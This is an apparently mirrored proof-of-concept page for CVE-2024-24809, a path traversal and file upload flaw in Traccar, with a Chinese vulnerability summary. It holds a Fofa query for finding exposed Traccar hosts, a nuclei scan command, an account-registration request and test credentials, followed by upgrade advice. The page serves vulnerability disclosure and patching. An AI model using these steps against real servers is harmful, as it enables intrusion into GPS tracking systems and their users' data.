目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1325

100%
请我们喝杯咖啡

CVE-2024-24809 PoC — Traccar 安全漏洞

来源
https://github.com/gh-ost00/CVE-2024-24809-Proof-of-concept
关联漏洞
标题:Traccar 安全漏洞 (CVE-2024-24809)
Description:Traccar是美国Traccar公司的一个基于Java的可提供GPS跟踪功能的建站系统。该软件支持170多种GPS协议和1500多种型号的GPS跟踪设备。Traccar可以与任何主要的SQL数据库系统一起使用。它还提供了易于使用的REST API。 Traccar 5.12及之前版本存在安全漏洞,该漏洞源于容易受到路径遍历和危险类型文件无限制上传的影响,攻击者可以通过注册账户获取普通用户权限,并利用该漏洞上传任意文件。
Description
Critical Flaws in Traccar GPS System Expose Users to Remote Attacks
介绍
### CVE-2024-24809 Detail

#Description
Traccar is an open source GPS tracking system. Versions prior to 6.0 are vulnerable to path traversal and unrestricted upload of file with dangerous type. 
Since the system allows registration by default, attackers can acquire ordinary user permissions by registering an account and exploit this vulnerability to upload files with the prefix `device.` under 
any folder. Attackers can use this vulnerability for phishing, cross-site scripting attacks, and potentially execute arbitrary commands on the server. Version 6.0 contains a patch for the issue.

#usage
```bash
Fofa query : app="traccar"
```
```bash
nuclei --target {target.com} -t CVE-2024-24809.yaml
```
#Proof of concept (using burpsuite)
```bash
POST /api/users HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8

{"name": "{{name}}", "email": "{{email}}", "password": "{{password}}", "totpKey": null}
```
#Testing account
```bash
name: "ghostsec"
password: "ghostsec"
email: "ghostsec@ghostsec.com"
```

### How to fix?
Upgrade org.traccar:traccar to version 6.0 or higher.
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →